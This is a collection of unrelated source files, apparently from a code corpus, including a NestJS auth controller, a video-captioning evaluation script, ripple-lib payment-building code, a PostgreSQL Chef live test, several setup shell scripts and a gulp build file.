'_PyGen_FetchStopIterationValue' : TFunc([],t_void),
'new_function' : TFunc([FunctionBody_ptr,PyObject_ptr,PyObject_ptr,PyObject_ptr,PyObject_ptr,TPtr(PyObject_ptr),TPtr(PyObject_ptr),PyObject_ptr],PyObject_ptr),
'new_generator' : TFunc([PyFrameObject_ptr,Function_ptr,size_t],PyObject_ptr),
'free_pyobj_array' : TFunc([TPtr(PyObject_ptr),Py_ssize_t],t_void),
'missing_arguments' : TFunc([Function_ptr,TPtr(PyObject_ptr)],t_void),
'too_many_positional' : TFunc([Function_ptr,t_long,PyObject_ptr],t_void),
'excess_keyword' : TFunc([Function_ptr,PyObject_ptr],t_void),
'append_tuple_for_call' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],PyObject_ptr),
'append_dict_for_call' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],PyObject_ptr),
'prepare_exc_handler' : TFunc([TPtr(PyObject_ptr)],t_void),
'end_exc_handler' : TFunc([TPtr(PyObject_ptr)],t_void),
'format_exc_check_arg' : TFunc([PyObject_ptr,const_char_ptr,PyObject_ptr],PyObject_ptr),
'format_exc_unbound' : TFunc([PyCodeObject_ptr,t_int],PyObject_ptr),
'_unpack_iterable' : TFunc([PyObject_ptr,t_int,t_int,TPtr(PyObject_ptr)],t_int),
'_exception_cmp' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'_do_raise' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'import_all_from' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'special_lookup' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'call_exc_trace' : TFunc([Py_tracefunc,PyObject_ptr,PyThreadState_ptr,PyFrameObject_ptr],t_void),
'_print_expr' : TFunc([PyObject_ptr],t_int),
'_load_build_class' : TFunc([PyObject_ptr],PyObject_ptr),
'c_global_name' : TFunc([PyObject_ptr,PyFrameObject_ptr],PyObject_ptr),
'c_local_name' : TFunc([PyObject_ptr,PyFrameObject_ptr],PyObject_ptr)
} |
import {
Body,
Controller,
Post,
UseGuards,
Request,
Get,
} from '@nestjs/common';
import { AuthGuard } from '@nestjs/passport';
import {
ApiBody,
ApiConflictResponse,
ApiCreatedResponse,
ApiOkResponse,
ApiOperation,
ApiParam,
ApiResponse,
ApiTags,
} from '@nestjs/swagger';
import { DoesUserExist } from 'src/core/guards/doesUserExist.guard';
import { LoginRequestDto } from '../users/dto/login.request.dto';
import { UserDto } from '../users/dto/user.dto';
import { AuthService } from './auth.service';
/**
 * Authentication endpoints: login for existing users and signup for new ones.
 * Swagger metadata is declared inline via the @Api* decorators; the actual
 * credential handling lives in AuthService.
 */
@ApiTags('Auth')
@Controller('auth')
export class AuthController {
  constructor(private authService: AuthService) {}

  @ApiOkResponse({
    description: 'The user login successfully.',
  })
  @ApiOperation({ summary: 'User login' })
  @Post('login')
  async login(@Body() loginDto: LoginRequestDto) {
    return await this.authService.login(loginDto);
  }

  @ApiOperation({ summary: 'User signup' })
  @ApiCreatedResponse({
    description: 'The user has been signup successfully.',
  })
  @ApiConflictResponse({ description: 'User already exists' })
  // NOTE(review): the conflict response is presumably produced by this guard
  // when the user already exists — confirm DoesUserExist's failure mode.
  @UseGuards(DoesUserExist)
  @Post('signup')
  async signUp(@Body() user: UserDto) {
    return await this.authService.create(user);
  }
}
|
<reponame>gyy8426/TF_concaption<gh_stars>0
import argparse, os, pdb, sys, time
import numpy as np
import copy
import glob
import subprocess
from multiprocessing import Process, Queue, Manager
from collections import OrderedDict
import data_engine
from cocoeval import COCOScorer
import utils
MAXLEN = 50
manager = Manager()
def update_params(shared_params, model_params):
    # Copy model parameters into the (multiprocessing-shared) dict and bump
    # its 'id' counter so consumers can detect the update.
    # (Python 2 source: dict.iteritems, consistent with the rest of the file.)
    for kk, vv in model_params.iteritems():
        shared_params[kk] = vv
    shared_params['id'] = shared_params['id'] + 1
def build_sample_pairs(samples, vidIDs):
    """Pair each generated caption with its video id in the structure the
    COCO scorer expects: {vidID: [{'image_id': vidID, 'caption': text}]}."""
    pairs = OrderedDict()
    for caption, vid in zip(samples, vidIDs):
        pairs[vid] = [{'image_id': vid, 'caption': caption}]
    return pairs
def score_with_cocoeval(samples_valid, samples_test, engine):
    # Run the COCO caption metrics over whichever splits have samples;
    # returns (valid_score, test_score) with None for a skipped split.
    scorer = COCOScorer()
    if samples_valid:
        # Ground-truth captions keyed by video id.
        gts_valid = OrderedDict()
        for vidID in engine.valid_ids:
            gts_valid[vidID] = engine.CAP[vidID]
        valid_score = scorer.score(gts_valid, samples_valid, engine.valid_ids)
    else:
        valid_score = None
    if samples_test:
        gts_test = OrderedDict()
        for vidID in engine.test_ids:
            gts_test[vidID] = engine.CAP[vidID]
        test_score = scorer.score(gts_test, samples_test, engine.test_ids)
    else:
        test_score = None
    return valid_score, test_score
def generate_sample_gpu_single_process(
        model_type, engine, options, sess, model,
        f_init_inputs,f_init_outputs, f_next_inputs, f_next_outputs,
        save_dir='./samples', beam=5,
        whichset='both'):
    # Generate captions with beam search for the valid/test splits in a
    # single process, write them to text files under save_dir, and return
    # them keyed by video id (via build_sample_pairs).
    # NOTE: Python 2 source (print statements below).
    def _seqs2words(caps):
        # Map word-index sequences back to strings; index 0 terminates a
        # caption.
        capsw = []
        for cc in caps:
            ww = []
            for w in cc:
                if w == 0:
                    break
                # Out-of-range indices fall back to ix_word[1] — presumably
                # the UNK token; confirm against vocabulary construction.
                ww.append(engine.ix_word[1]
                    if w > len(engine.ix_word) else engine.ix_word[w])
            capsw.append(' '.join(ww))
        return capsw
    def sample(whichset):
        samples = []
        ctxs, ctx_masks = engine.prepare_data_for_blue(whichset)
        for i, ctx, ctx_mask in zip(range(len(ctxs)), ctxs, ctx_masks):
            # In-place progress indicator.
            sys.stdout.write('\rsampling %d/%d'%(i,len(ctxs)))
            sys.stdout.flush()
            sample, score, _, _ = model.gen_sen_beam_search(sess, ctx, ctx_mask,
                f_init_inputs,f_init_outputs,
                f_next_inputs,f_next_outputs,
                k=beam, maxlen=50)
            # Keep the lowest-cost beam hypothesis.
            sidx = np.argmin(score)
            sample = sample[sidx]
            #print _seqs2words([sample])[0]
            samples.append(sample)
        samples = _seqs2words(samples)
        return samples
    samples_valid = None
    samples_test = None
    if whichset == 'valid' or whichset == 'both':
        print 'Valid Set...',
        samples_valid = sample('valid')
        with open(save_dir+'valid_samples.txt', 'w') as f:
            print >>f, '\n'.join(samples_valid)
    if whichset == 'test' or whichset == 'both':
        print 'Test Set...',
        samples_test = sample('test')
        with open(save_dir+'test_samples.txt', 'w') as f:
            print >>f, '\n'.join(samples_test)
    if samples_valid:
        samples_valid = build_sample_pairs(samples_valid, engine.valid_ids)
    if samples_test:
        samples_test = build_sample_pairs(samples_test, engine.test_ids)
    return samples_valid, samples_test
def compute_score(
        model_type,
        options,
        engine,
        sess , model ,
        save_dir,
        beam=5, n_process=5,
        whichset='both',
        on_cpu=False,
        processes=None, queue=None, rqueue=None,
        shared_params=None, metric=None,
        one_time=False,
        f_init_inputs=None,f_init_outputs=None,
        f_next_inputs=None,f_next_outputs=None
        ):
    # Generate captions and score them with the COCO metrics. Only the
    # single-process GPU path is implemented here; perplexity is handled
    # elsewhere, hence the assert.
    assert metric != 'perplexity'
    if on_cpu:
        raise NotImplementedError()
    else:
        assert model is not None
        samples_valid, samples_test = generate_sample_gpu_single_process(
            model_type,engine, options, sess, model,
            f_init_inputs,f_init_outputs, f_next_inputs, f_next_outputs,
            save_dir=save_dir,
            beam=beam,
            whichset=whichset)
    valid_score, test_score = score_with_cocoeval(samples_valid, samples_test, engine)
    scores_final = {}
    scores_final['valid'] = valid_score
    scores_final['test'] = test_score
    # one_time callers only want the scores; otherwise the (unused here)
    # multiprocessing plumbing is passed back through.
    if one_time:
        return scores_final
    return scores_final, processes, queue, rqueue, shared_params
def test_cocoeval():
    # Smoke test: score previously generated sample files against the
    # youtube2text ground truth.
    engine = data_engine.Movie2Caption('attention', 'youtube2text',
        video_feature='googlenet',
        mb_size_train=20,
        mb_size_test=20,
        maxlen=50, n_words=20000,
        n_frames=20, outof=None)
    samples_valid = utils.load_txt_file('./test/valid_samples.txt')
    samples_test = utils.load_txt_file('./test/test_samples.txt')
    samples_valid = [sample.strip() for sample in samples_valid]
    samples_test = [sample.strip() for sample in samples_test]
    samples_valid = build_sample_pairs(samples_valid, engine.valid_ids)
    samples_test = build_sample_pairs(samples_test, engine.test_ids)
    valid_score, test_score = score_with_cocoeval(samples_valid, samples_test, engine)
    print valid_score, test_score
if __name__ == '__main__':
    test_cocoeval()
|
<reponame>nuxt/blueprints<gh_stars>10-100
// Nuxt configuration: registers only the @nuxt/press module.
export default {
  modules: ['@nuxt/press']
}
|
package azuread

import (
	"os"
	"strings"
)

// This file contains feature flags for functionality which will prove more challenging to implement en-mass

// requireResourcesToBeImported is enabled when ARM_PROVIDER_STRICT=true
// (case-insensitive) is set in the environment.
var requireResourcesToBeImported = strings.EqualFold(os.Getenv("ARM_PROVIDER_STRICT"), "true")
|
# Ensure the tars log directories live under /data and are reachable from
# /usr/local/app/tars via symlinks, then launch tarsnode.
if [ ! -d /usr/local/app/tars/app_log ]; then
    # NOTE(review): /data/log/tars is created but never linked below —
    # confirm whether it is still needed.
    mkdir -p /data/log/tars
    mkdir -p /usr/local/app/tars
    mkdir -p /data/tars/app_log
    ln -s /data/tars/app_log /usr/local/app/tars/app_log
fi
if [ ! -d /usr/local/app/tars/remote_app_log ]; then
    mkdir -p /data/tars/remote_app_log
    ln -s /data/tars/remote_app_log /usr/local/app/tars/remote_app_log
fi
# Run the node start script from the install directory.
cd /usr/local/app/tars/
chmod +x tarsnode/util/*.sh
tarsnode/util/start.sh ;
|
<filename>stream-chat-javascript/node_modules/ripple-lib/dist/npm/transaction/payment.js
"use strict";
var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
if (k2 === undefined) k2 = k;
Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } });
}) : (function(o, m, k, k2) {
if (k2 === undefined) k2 = k;
o[k2] = m[k];
}));
var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
Object.defineProperty(o, "default", { enumerable: true, value: v });
}) : function(o, v) {
o["default"] = v;
});
var __importStar = (this && this.__importStar) || function (mod) {
if (mod && mod.__esModule) return mod;
var result = {};
if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);
__setModuleDefault(result, mod);
return result;
};
Object.defineProperty(exports, "__esModule", { value: true });
const _ = __importStar(require("lodash"));
const utils = __importStar(require("./utils"));
const validate = utils.common.validate;
const toRippledAmount = utils.common.toRippledAmount;
const paymentFlags = utils.common.txFlags.Payment;
const ValidationError = utils.common.errors.ValidationError;
const common_1 = require("../common");
const utils_1 = require("./utils");
// True when the source adjustment specifies maxAmount (send-max style).
function isMaxAdjustment(source) {
    const { maxAmount } = source;
    return maxAmount !== undefined;
}
// True when the destination adjustment specifies minAmount (deliver-min style).
function isMinAdjustment(destination) {
    return !(destination.minAmount === undefined);
}
// A payment is XRP-to-XRP when both endpoints are denominated in XRP or drops.
function isXRPToXRPPayment(payment) {
    const { source, destination } = payment;
    const srcCurrency = isMaxAdjustment(source)
        ? source.maxAmount.currency
        : source.amount.currency;
    const dstCurrency = isMinAdjustment(destination)
        ? destination.minAmount.currency
        : destination.amount.currency;
    const isXRP = (currency) => currency === 'XRP' || currency === 'drops';
    return isXRP(srcCurrency) && isXRP(dstCurrency);
}
// An issued-currency (IOU) amount that does not name a counterparty.
// A falsy amount is returned unchanged, mirroring the short-circuit of `&&`
// in the original expression.
function isIOUWithoutCounterparty(amount) {
    if (!amount) {
        return amount;
    }
    const { currency, counterparty } = amount;
    return currency !== 'XRP' && currency !== 'drops' && counterparty === undefined;
}
// Fill in the implicit counterparty: an IOU amount without one is treated as
// issued by the adjustment's own address. Mutates the payment in place.
function applyAnyCounterpartyEncoding(payment) {
    [payment.source, payment.destination].forEach((adjustment) => {
        for (const key of ['amount', 'minAmount', 'maxAmount']) {
            if (isIOUWithoutCounterparty(adjustment[key])) {
                adjustment[key].counterparty = adjustment.address;
            }
        }
    });
}
// Return a copy of `amount` whose value is raised to the ledger maximum for
// its denomination (XRP, drops, or an issued currency).
function createMaximalAmount(amount) {
    const maxXRPValue = '100000000000';
    const maxIOUValue = '999999999999999900000000000000000000000000000000000000000000000000000000000000000000000000000000';
    let maxValue;
    switch (amount.currency) {
        case 'XRP':
            maxValue = maxXRPValue;
            break;
        case 'drops':
            maxValue = common_1.xrpToDrops(maxXRPValue);
            break;
        default:
            maxValue = maxIOUValue;
    }
    return Object.assign({}, amount, { value: maxValue });
}
// Resolve an address into classic account + tag (verifying any expected
// tag); a tag of `false` is normalised to undefined.
function validateAndNormalizeAddress(address, expectedTag) {
    const classicAddress = utils_1.getClassicAccountAndTag(address, expectedTag);
    classicAddress.tag =
        classicAddress.tag === false ? undefined : classicAddress.tag;
    return classicAddress;
}
// Builds rippled Payment txJSON from a ripple-lib payment specification.
// `address` (and its tag, when both sides carry one) must agree with
// payment.source; throws ValidationError otherwise.
function createPaymentTransaction(address, paymentArgument) {
    // Deep-copy first so the counterparty encoding below never mutates the
    // caller's payment object.
    const payment = _.cloneDeep(paymentArgument);
    applyAnyCounterpartyEncoding(payment);
    const sourceAddressAndTag = validateAndNormalizeAddress(payment.source.address, payment.source.tag);
    const addressToVerifyAgainst = validateAndNormalizeAddress(address, undefined);
    if (addressToVerifyAgainst.classicAccount !== sourceAddressAndTag.classicAccount) {
        throw new ValidationError('address must match payment.source.address');
    }
    if (addressToVerifyAgainst.tag !== undefined &&
        sourceAddressAndTag.tag !== undefined &&
        addressToVerifyAgainst.tag !== sourceAddressAndTag.tag) {
        throw new ValidationError('address includes a tag that does not match payment.source.tag');
    }
    const destinationAddressAndTag = validateAndNormalizeAddress(payment.destination.address, payment.destination.tag);
    // Exactly one side may be flexible: either (source.maxAmount +
    // destination.amount) or (source.amount + destination.minAmount).
    if ((isMaxAdjustment(payment.source) && isMinAdjustment(payment.destination)) ||
        (!isMaxAdjustment(payment.source) && !isMinAdjustment(payment.destination))) {
        throw new ValidationError('payment must specify either (source.maxAmount ' +
            'and destination.amount) or (source.amount and destination.minAmount)');
    }
    const destinationAmount = isMinAdjustment(payment.destination)
        ? payment.destination.minAmount
        : payment.destination.amount;
    const sourceAmount = isMaxAdjustment(payment.source)
        ? payment.source.maxAmount
        : payment.source.amount;
    // For cross-currency deliver-min payments the tx Amount is set to an
    // effectively unlimited value; the real floor is enforced by DeliverMin
    // (set further down).
    const amount = isMinAdjustment(payment.destination) && !isXRPToXRPPayment(payment)
        ? createMaximalAmount(destinationAmount)
        : destinationAmount;
    const txJSON = {
        TransactionType: 'Payment',
        Account: sourceAddressAndTag.classicAccount,
        Destination: destinationAddressAndTag.classicAccount,
        Amount: toRippledAmount(amount),
        Flags: 0
    };
    if (payment.invoiceID !== undefined) {
        txJSON.InvoiceID = payment.invoiceID;
    }
    // Tags (explicit or recovered by validateAndNormalizeAddress) become
    // SourceTag / DestinationTag fields.
    if (sourceAddressAndTag.tag !== undefined) {
        txJSON.SourceTag = sourceAddressAndTag.tag;
    }
    if (destinationAddressAndTag.tag !== undefined) {
        txJSON.DestinationTag = destinationAddressAndTag.tag;
    }
    if (payment.memos !== undefined) {
        txJSON.Memos = _.map(payment.memos, utils.convertMemo);
    }
    if (payment.noDirectRipple === true) {
        txJSON.Flags |= paymentFlags.NoRippleDirect;
    }
    if (payment.limitQuality === true) {
        txJSON.Flags |= paymentFlags.LimitQuality;
    }
    // SendMax / DeliverMin / Paths only apply when at least one leg is not XRP.
    if (!isXRPToXRPPayment(payment)) {
        if (payment.allowPartialPayment || isMinAdjustment(payment.destination)) {
            txJSON.Flags |= paymentFlags.PartialPayment;
        }
        txJSON.SendMax = toRippledAmount(sourceAmount);
        if (isMinAdjustment(payment.destination)) {
            txJSON.DeliverMin = toRippledAmount(destinationAmount);
        }
        if (payment.paths !== undefined) {
            // payment.paths is a JSON-encoded string of path steps.
            txJSON.Paths = JSON.parse(payment.paths);
        }
    }
    else if (payment.allowPartialPayment === true) {
        throw new ValidationError('XRP to XRP payments cannot be partial payments');
    }
    return txJSON;
}
// Prepares an unsigned Payment transaction from a ripple-lib payment object.
// Expects to be invoked with the API object bound as `this` (forwarded to
// utils.prepareTransaction). Always returns a promise: synchronous
// validation/build errors are converted into a rejected promise rather than
// thrown to the caller.
function preparePayment(address, payment, instructions = {}) {
    try {
        validate.preparePayment({ address, payment, instructions });
        const txJSON = createPaymentTransaction(address, payment);
        return utils.prepareTransaction(txJSON, this, instructions);
    }
    catch (e) {
        return Promise.reject(e);
    }
}
exports.default = preparePayment;
//# sourceMappingURL=payment.js.map |
<filename>software/database/src/test/java/brooklyn/entity/database/postgresql/PostgreSqlChefTest.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package brooklyn.entity.database.postgresql;
import java.util.Random;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.testng.Assert;
import org.testng.annotations.Test;
import brooklyn.entity.basic.Entities;
import brooklyn.entity.chef.ChefLiveTestSupport;
import brooklyn.entity.database.DatastoreMixins.DatastoreCommon;
import brooklyn.entity.database.VogellaExampleAccess;
import brooklyn.entity.effector.EffectorTasks;
import brooklyn.entity.software.SshEffectorTasks;
import brooklyn.location.PortRange;
import brooklyn.location.basic.PortRanges;
import brooklyn.location.basic.SshMachineLocation;
import brooklyn.util.task.system.ProcessTaskWrapper;
import brooklyn.util.time.Duration;
import com.google.common.collect.ImmutableList;
/**
* Tests Chef installation of PostgreSql. Requires chef-server (knife).
* <p>
* To be able to run repeatedly on the same box, you will need the patched version of the postgresql library,
* at https://github.com/opscode-cookbooks/postgresql/pull/73 .
*
* @author alex
*
*/
public class PostgreSqlChefTest extends ChefLiveTestSupport {

    private static final Logger log = LoggerFactory.getLogger(PostgreSqlChefTest.class);

    // Entity under test; assigned per test method.
    PostgreSqlNode psql;

    @Test(groups="Live")
    public void testPostgresStartsAndStops() throws Exception {
        ChefLiveTestSupport.installBrooklynChefHostedConfig(app);
        psql = app.createAndManageChild(PostgreSqlSpecs.specChef());
        app.start(ImmutableList.of(targetLocation));

        // after start, a postgres process must be visible over ssh (exit code 0)
        Entities.submit(psql, SshEffectorTasks.ssh("ps aux | grep [p]ostgres").requiringExitCodeZero());
        SshMachineLocation targetMachine = EffectorTasks.getSshMachine(psql);

        psql.stop();

        try {
            // if host is still contactable ensure postgres is not running
            ProcessTaskWrapper<Integer> t = Entities.submit(app, SshEffectorTasks.ssh("ps aux | grep [p]ostgres").machine(targetMachine).allowingNonZeroExitCode());
            t.getTask().blockUntilEnded(Duration.TEN_SECONDS);
            if (!t.isDone())
                Assert.fail("Task not finished yet: "+t.getTask());
            // non-zero exit means grep found no postgres process, as expected
            Assert.assertNotEquals(t.get(), (Integer)0, "Task ended with code "+t.get()+"; output: "+t.getStdout() );
        } catch (Exception e) {
            // host has been killed, that is fine
            log.info("Machine "+targetMachine+" destroyed on stop (expected - "+e+")");
        }
    }

    @Test(groups="Live")
    public void testPostgresScriptAndAccess() throws Exception {
        ChefLiveTestSupport.installBrooklynChefHostedConfig(app);
        // open-ended port range starting at a random port in 5420..5429, so
        // repeated runs on the same box avoid colliding on one port
        PortRange randomPort = PortRanges.fromString(String.format("%d+", 5420 + new Random().nextInt(10)));
        psql = app.createAndManageChild(PostgreSqlSpecs.specChef()
            .configure(DatastoreCommon.CREATION_SCRIPT_CONTENTS, PostgreSqlIntegrationTest.CREATION_SCRIPT)
            .configure(PostgreSqlNode.POSTGRESQL_PORT, randomPort)
            .configure(PostgreSqlNode.SHARED_MEMORY, "8MB")
        );
        app.start(ImmutableList.of(targetLocation));

        String url = psql.getAttribute(DatastoreCommon.DATASTORE_URL);
        log.info("Trying to connect to "+psql+" at "+url);
        Assert.assertNotNull(url);
        // expects the allocated port to keep the 542x prefix chosen above
        Assert.assertTrue(url.contains("542"));

        new VogellaExampleAccess("org.postgresql.Driver", url).readModifyAndRevertDataBase();
    }
}
|
#!/bin/sh
# Annotate the plaintext documents.
# Runs the `bin/annotate-text` entrypoint of the odinson-extras image against
# the local odinson data directory (mounted into the container), using
# CluProcessor as the annotator. The container is interactive (-it) and is
# removed when it exits (--rm). No comments may appear between the
# backslash-continued lines below.
ODINSON_DATA_HOME="$(pwd)/data/odinson"
docker run \
    --name="odinson-extras" \
    -it \
    --rm \
    -e "HOME=/app" \
    -e "JAVA_OPTS=-Dodinson.extra.processorType=CluProcessor" \
    -v "$ODINSON_DATA_HOME:/app/data/odinson" \
    --entrypoint "bin/annotate-text" \
    "lumai/odinson-extras:latest"
|
#!/bin/bash
# chmod +x matplotlib_ja.sh
# sh ./matplotlib_ja.sh
# Download Japanese fonts and install them for matplotlib.

# Print a message in green so the setup steps stand out.
function logging() {
    echo -e "\033[0;32m$1\033[0m"
}

FONT_PATH="https://ipafont.ipa.go.jp/IPAfont/IPAfont00303.zip"
TMP_NAME="font.zip"
FONT_DIR="IPAfont00303"
FONT_FILENAME="ipam.ttf"
FONT_NAME="IPAMincho"
MATPLOTLIBPATH=$(python3 -c "import matplotlib; print(matplotlib.__path__[0])")
# NOTE(review): recent matplotlib versions name the cache "fontlist-vNNN.json";
# this path only matches older releases — confirm against the installed version.
CACHE_FILE="$(python3 -c 'import matplotlib; print(matplotlib.get_cachedir())')/fontList.cache"

echo "[Download and set up Japanese fonts for 'matplotlib']"
echo -n "1. Download font from "; logging "$FONT_PATH"
echo -n "2. Then, set it to "; logging "${MATPLOTLIBPATH}/mpl-data/fonts/ttf/${FONT_FILENAME}"
echo -n "3. Add 'font.family : ${FONT_NAME}' to "; logging "${MATPLOTLIBPATH}/mpl-data/matplotlibrc"

# Download, unpack, install the font file, and register it in matplotlibrc.
# (The original ended this chain with a dangling "&& \" that continued into a
# comment line, which made the cleanup below the right-hand side of "&&" —
# so the cache/zip/font-dir cleanup was silently skipped on any failure.)
wget "$FONT_PATH" -O "$TMP_NAME" &&
    unzip "$TMP_NAME" &&
    cp "${FONT_DIR}/${FONT_FILENAME}" "${MATPLOTLIBPATH}/mpl-data/fonts/ttf/${FONT_FILENAME}" &&
    echo "font.family : ${FONT_NAME}" >> "${MATPLOTLIBPATH}/mpl-data/matplotlibrc"

# Force a font-cache rebuild by deleting the stale cache, then clean up
# the downloaded archive and the extracted directory unconditionally.
if [ -e "$CACHE_FILE" ]; then
    rm "$CACHE_FILE"
fi
if [ -e "$TMP_NAME" ]; then
    rm "$TMP_NAME"
fi
if [ -e "$FONT_DIR" ]; then
    rm -r "$FONT_DIR"
fi
#!/bin/sh
# Launch 50 concurrent TestHttp runs against the local web container, each
# writing its error log under $TEST_HOME.
TEST_HOME=/home/bingli/testhttp
# Was `count 50`, which tries to run a command named "count" and never sets
# the variable — leaving $count empty so the loop never started at 50 and
# `let count--` (a bashism under /bin/sh) drove it negative forever.
count=50
while [ "$count" != 0 ]; do
    java -jar test.jar com.bingli.performance.TestHttp http://localhost:8080/WebContainerTest/ "$TEST_HOME/error$count.log" 1>/dev/null 2>&1 &
    count=$((count - 1))
done
<reponame>ComfortablyCoding/strapi-plugin-io
'use strict';

/**
 * Retrieves all strapi rooms (roles).
 *
 * Queries the users-permissions role collection via the global `strapi`
 * entity service, selecting only each role's name and the `action` field of
 * its permissions. Returns the entity-service promise.
 */
const getStrapiRooms = () =>
    strapi.entityService.findMany('plugin::users-permissions.role', {
        fields: ['name'],
        populate: {
            permissions: {
                fields: ['action'],
            },
        },
    });

module.exports = {
    getStrapiRooms,
};
|
const gulp = require('gulp');
const gutil = require("gulp-util");
const babel = require('gulp-babel');
const webpack = require('webpack-stream');
const postcss = require('gulp-postcss');
const postcssApply = require('postcss-apply');
const postcssImport = require('postcss-import');
const postcssMixins = require('postcss-mixins');
const postcssCssnext = require('postcss-cssnext');
const postcssComments = require('postcss-discard-comments');
const postcssNested = require('postcss-nested');
const postcssEach = require('postcss-each');
const postcssGradient = require('postcss-easing-gradients');
const postcssFor = require('postcss-for');
const postcssCond = require('postcss-conditionals');
const postcssSimple = require('postcss-simple-vars');
const postcssProps = require('postcss-custom-properties');
const postcssReporter = require('postcss-reporter');
const sourcemaps = require('gulp-sourcemaps');
const cssnano = require('gulp-cssnano');
const rename = require('gulp-rename');
const eslint = require('gulp-eslint');
const banner = require('gulp-banner');
const manifest = require('gulp-manifest');
const modernizr = require('gulp-modernizr');
const imagemin = require('gulp-imagemin');
const htmlmin = require('gulp-htmlmin');
const notify = require('gulp-notify');
const iconfont = require('gulp-iconfont');
const consolidate = require('gulp-consolidate');
const replace = require('gulp-replace');
const pkg = require('./package.json');
const browserSync = require('browser-sync').create();
const reload = browserSync.reload;
const comment = `/*!
* ${pkg.name}
*
* Made with ❤ by ${pkg.author}
*
* Copyright (c) ${(new Date()).getFullYear()} ${pkg.copyright}
*/
`;
const src = {
cssAll: 'assets/css/_src/**/*.css',
cssMain: 'assets/css/_src/main.css',
cssDest: 'assets/css',
jsAll: 'assets/js/_src/**/*.js',
jsMain: 'assets/js/_src/main.js',
jsDest: 'assets/js',
iconsAll: 'assets/icons/*.svg',
iconsCss: 'assets/icons/_template/_icons.css',
iconsCssDest: 'assets/css/_src/partials/modules/',
iconsDest: 'assets/fonts',
};
const babelMinify = [
'minify',
{
mangle: {
exclude: ['jQuery', '$']
},
deadcode: true,
removeConsole: true,
removeDebugger: true,
removeUndefined: true,
}
];
const prefixConfig = {
diff: true,
map: false,
remove: false,
};
const eslintConfig = require('./.config/eslint.config');
const webpackConfig = require('./.config/webpack.config');
// Serve the site through BrowserSync (proxying the local vhost, reloading on
// any html/php change) and re-run the css/js/iconfont tasks when their
// source globs change.
gulp.task('watch', () => {
    browserSync.init(['**/*.html', '**/*.php'], {
        proxy: 'xmas-2017.local',
        port: 3000,
        open: true,
        notify: false,
    });
    gulp.watch(src.cssAll, ['css']);
    gulp.watch(src.jsAll, ['js']);
    gulp.watch(src.iconsAll, ['iconfont']);
});
// Build bundle.css and bundle.min.css from the PostCSS entry point.
// Errors in the plugin chain are routed to gulp's `done` callback so the
// task fails instead of hanging.
gulp.task('css', (done) => {
    return gulp.src(src.cssMain)
        // .pipe(sourcemaps.init())
        .pipe(postcss([
            // plugins run in listed order: imports/mixins/vars first,
            // cssnext + nesting after, comment stripping and reporting last
            postcssImport,
            postcssMixins,
            postcssProps,
            postcssFor,
            postcssEach,
            postcssSimple,
            postcssCond,
            postcssGradient,
            postcssApply,
            postcssCssnext(prefixConfig),
            postcssNested,
            postcssComments({removeAll: true}),
            postcssReporter({ clearMessages: true }),
        ]))
        .on('error', done)
        // .pipe(sourcemaps.write())
        // unminified bundle with the banner comment
        .pipe(rename('bundle.css'))
        .pipe(banner(comment))
        .pipe(gulp.dest(src.cssDest))
        // minified variant of the same stream
        .pipe(cssnano({
            discardComments: {
                removeAll: true
            },
            zindex: false,
        }))
        .pipe(rename('bundle.min.css'))
        .pipe(banner(comment))
        .pipe(gulp.dest(src.cssDest))
        .pipe(reload({stream: true}))
        .pipe(notify('css done'));
});
// Transpile main.js with Babel into bundle.js, then strip the
// `window.app = ...` assignment and emit a minified bundle.min.js.
// Depends on 'eslint' and 'fallback' running first (gulp 3 task deps).
gulp.task('js', ['eslint', 'fallback'], () => {
    return gulp.src(src.jsMain)
        // .pipe(webpack(webpackConfig)).on('error', onError)
        .pipe(babel({
            presets: ['env'],
        }))
        .pipe(rename('bundle.js'))
        .pipe(banner(comment))
        .pipe(gulp.dest(src.jsDest))
        // remove the window.app assignment line before minifying
        .pipe(replace(/window\.app\s\=.*/, ''))
        .pipe(babel({
            presets: [babelMinify]
        }))
        .pipe(rename('bundle.min.js'))
        .pipe(banner(comment))
        .pipe(gulp.dest(src.jsDest))
        .pipe(reload({stream: true}))
        .pipe(notify('js done'));
});
gulp.task('eslint', () => {
return gulp.src(src.jsAll)
.pipe(eslint(eslintConfig))
.pipe(eslint.format());
});
gulp.task('fallback', () => {
return gulp.src('assets/js/_src/fallback.js')
.pipe(babel({
presets: ['env'],
}))
.pipe(banner(comment))
.pipe(gulp.dest(src.jsDest))
.pipe(babel({
presets: [babelMinify]
}))
.pipe(rename('fallback.min.js'))
.pipe(banner(comment))
.pipe(gulp.dest(src.jsDest));
});
gulp.task('vendor', () => {
return gulp.src([
// 'node_modules/jquery/dist/jquery*',
'node_modules/promise-polyfill/promise.*',
// 'node_modules/objectFitPolyfill/dist/*',
// 'node_modules/intersection-observer/intersection-observer.js',
'node_modules/object.assign-polyfill/object.assign.js',
])
.pipe(gulp.dest('assets/js/vendor'));
});
gulp.task('modernizr', () => {
return gulp.src([`${src.cssDest}/*.css`, `${src.jsDest}/*.js`])
.pipe(modernizr({
"cache": false,
"extra" : {
"shiv" : true,
"printshiv" : true,
"load" : true,
"mq" : true,
"cssclasses" : true
},
"options" : [
"setClasses",
"addTest",
"html5printshiv",
"testProp",
"fnBind",
"mq"
],
"excludeTests": [
"hidden"
],
"parseFiles" : true,
"crawl" : true,
"uglify" : true,
"matchCommunityTests" : true,
}))
.pipe(babel({
presets: [babelMinify]
}))
